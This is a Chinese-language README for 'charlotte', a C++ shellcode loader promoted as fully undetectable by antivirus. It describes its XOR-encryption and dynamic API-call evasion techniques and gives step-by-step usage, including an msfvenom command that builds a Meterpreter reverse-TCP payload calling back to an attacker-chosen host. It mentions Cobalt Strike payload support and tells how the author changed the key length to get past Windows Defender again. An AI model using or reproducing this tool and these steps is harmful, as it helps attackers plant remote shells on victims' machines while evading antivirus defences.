charlotte
c++ 完全免杀的 shellcode 加载器 ;)
发布此工具以庆祝我的新生儿诞生
描述
13/05/2021:
- c++ shellcode 加载器,截至 2021 年 5 月 13 日完全免杀 (0/26)。
- 动态调用 win32 API 函数
- shellcode 和函数名的 XOR 加密
- 每次运行随机化 XOR 密钥和变量
- 在 Kali Linux 上,只需 'apt-get install mingw-w64*' 即可!
17/05/2021:
- 随机字符串长度和 XOR 密钥长度
antiscan.me

使用方法
git clone 仓库,生成名为 beacon.bin 的 shellcode 文件,然后运行 charlotte.py
示例:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- 收工
经 msfvenom -p 测试(见下方 .gif POC 演示),同时也支持 cobalt strike 原始格式 payload

更新 v1.1
17/05/21:
显然 Microsoft Windows Defender 能够检测到 .DLL 二进制文件,
它们是如何标记的?通过查找几个 16 字节大小的 XOR 密钥
将其更改为 9(如下方 .gif POC 所示),现在再次免杀
干杯!
